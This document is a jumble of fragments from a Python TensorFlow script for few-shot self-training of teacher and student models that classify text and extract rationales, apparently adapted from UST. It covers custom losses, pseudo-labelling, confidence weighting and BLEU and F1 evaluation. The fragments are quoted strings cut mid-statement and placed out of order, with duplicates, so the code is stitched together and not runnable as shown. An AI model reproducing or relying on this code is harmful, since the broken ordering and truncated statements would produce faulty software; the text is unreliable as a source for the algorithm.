"X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices],", "if 'fine_tune_teacher' in type_: rat_loss = None if 'focal' in type_: rat_loss =", "temp['score'] = 
nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f) model_student", "val_loss[0] < best_validation_loss: best_base_model = model best_validation_loss = val_loss[0] model = best_base_model '''", "type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat =", "np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc score:", "float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X, y, X_test, y_test,", "X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_: X_train,", "in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in", "rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0, 1.0]", "logger.info (\"Best validation acc for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if", "len(labels), y_T=y_T, type_=type_) probs = y_val[indices] probs_rat = y_rat[indices] cls = list(acc[indices]) logger.info(cls)", "= (max_learn_rate/warmup_epoch_count) * 
(epoch + 1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler", "type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce =", "y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}", "elif 'joint' in type_: acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1)", "y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0],", "axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true,", "type_ == 'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope():", "(task) for joint {}\".format(temp)) logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val acc (task)", "custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2,", "if '_noexp' in type_: loss_weights = [1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp' in", "range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp))", "average='macro'))) logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) 
logger.info(\"Token Predictions shape {}\".format(test_pred.shape))", "loaded from {}\".format(model_file)) break elif 'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]],", "np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc =", "y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss", "#fix hardcoding labels = set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split X and y", "(\"Sampling uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices],", "callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info", "= None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)", "\"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:],", "tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss", "using few-shot learning. 
This code base is adapted from UST (https://github.com/microsoft/UST) \"\"\" from", "1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg", "for counter in range(N_base): #original N_base=10 with strategy.scope(): if 'mtl' in type_: rat_loss", "X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))],", "val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss < best_loss:", "logger.info (\"Test token acc for run {} : {}\".format(counter, test_acc)) logger.info (\"Best Test", "set (teacher model): {} \".format(score4/len(pred))) best_loss = np.inf data = [] for i", "in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test,", "Test task acc for run {} with total loss : {}\".format(counter, task_acc)) if", "as np import os, sys import json import nltk import tensorflow as tf", "test set (teacher model): {} \".format(score4/len(pred))) best_loss = np.inf data = [] for", "= model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc,", "np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: indx = indx[:unsup_size] logger.info(\"Shape", "0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0,", "(\"Test acc (task) 
{}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc = test_task_acc model_file =", "{} with total loss : {}\".format(counter, task_acc)) if 'mtl' in type_: class_acc =", "acc, y_pred, r_acc = out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat", "probs = y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else: logger.info(\"No", "axis=-1) logger.info(\"Printing prediction data on student model for run {}: {}\".format(counter, test_pred)) tp,", "logger.info (\"Model file loaded from {}\".format(model_file)) break elif 'mtl' in type_ : logger.info(y_train.shape)", "'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter == 0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\")", "[1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in type_: loss_weights = [1.0, 0,", "#_student = deepcopy(model) ''' if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc =", "\"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task)", "temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for j", "0, 0, 0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0]", "epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0],", "= pred[i] temp['score'] = 
nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data,", "N_base=10 with strategy.scope(): if 'mtl' in type_: rat_loss = None if 'focal' in", "y_mean, y_var, y_T = None, None, None if 'mtl' in type_: acc, y_pred", "''' probs = y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else:", "None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in type_: rat_loss = None", "np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf", "np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None] y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape", "y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not", "len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] elif 'joint' in type_:", "{}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss =", "best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, 
truth =", "if '_neg' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices],", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_: #re-weight rationales X_conf[:,1:] = np.where(log_rationale>0,", "\"attention_mask\": attention_mask_r} #mask tokens that are not rationales u-r if '_neg' in type_:", "shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss =", "from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random from sklearn.metrics import f1_score from sklearn.metrics", "= model_student.predict(X_test) acc, y_pred, r_acc = out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred", "model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, truth", "max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word in temp_p: if word in temp_t:", "{}\".format(temp)) 
logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test", "deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss <", "in type_: out = model.predict(X_test) class_acc, test_pred, r_acc = out[0], out[1], out[2] class_acc", "task_acc, test_acc, r_acc = out[3], out[4], out[5] elif 'joint' in type_: out =", "y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]])", "X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_: X_rationale_batch = {\"input_ids_r\":", "'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss", "'l2_distance': None}) elif 'joint_neg' in type_: rat_loss = None if 'focal' in type_:", "X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:],", "#split X and y to train and dev with valid_split if valid_split >", "model_student.load_weights(model_file_best) if 'mtl' in type_: acc, y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1)", "if '_neg' in type_: X_negation_sample = {\"input_ids\": 
np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for", "{\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\":", "tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] ==", "for Rationale using few-shot learning. This code base is adapted from UST (https://github.com/microsoft/UST)", "weights=(1, 0, 0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3 +=", "range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to skip evaluation", "of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}", "{}\".format(y_batch.shape)) indices = [] for i in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED =", "test_pred, r_acc = out[0], out[1], out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape", "weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test set (teacher model):", "acc[:,None] y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = [] for", "if 'norm' in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for", "#sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on student model for", "0, 0] if 
'_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] '''", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev,", "type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint,", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0]", "X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True,", "in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1", "1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var,", "''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "y_test[:,0], average='macro'))) logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape", 
"{}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth =", "#np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on student model for run {}: {}\".format(counter, test_pred))", "out[0], out[1], out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model", "#.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:]", "loop {}\".format(epoch)) if type_ == 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc", "= np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0],", "#re-weight labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in type_: X_conf[:,0] =", "epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch + 1) else: res =", "out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred", "X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl' in type_:", "= [1.0, 0, 0, 0] if '_no_suffcomp' in type_: loss_weights = [1.0, 1.0,", "np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)),", "Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled", "verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], 
np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc:", "len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif", "sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None):", "{} \".format(score4/len(pred))) best_loss = np.inf data = [] for i in range(len(X_test[\"input_ids\"])): text", "{\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for i in", "reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0))", "in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices],", "'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: ids = [] attention_mask_r =", "#, sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss = None if 
'focal' in type_:", "= model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc',", "X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0],", "saved to {}\".format(model_file)) model_student = model model_student.load_weights(model_file_best) if 'mtl' in type_: acc, y_pred", "y_train acc, y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val = acc y_rat =", "axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint'", "model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1", "np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample,", "logging import math import models import numpy as np import os, sys import", "1: #to skip evaluation of the task label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+=", "if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] =", "\"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for i in range(len(y_pred))]) acc = acc[:,None]", "elif 'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0],", 
"acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None] y_batch = np.concatenate((acc, y_pred),", "shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight)", "= deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc", "loss_weights = [1.0, 0.0] else: loss_weights = [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if", "for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1:", "0.0 for i in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2", "= {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch =", "1.0, 1.0, 1.0] ''' if '_noexp' in type_: loss_weights = [1.0, 0, 0,", "batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1)", "= dict() temp['text'] = text temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] =", "loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 
'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights)", "= np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1,", "y_pred, r_acc = out[0], out[1], out[2] #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred,", "= list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale =", "if 'mtl' in type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs,", "X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} 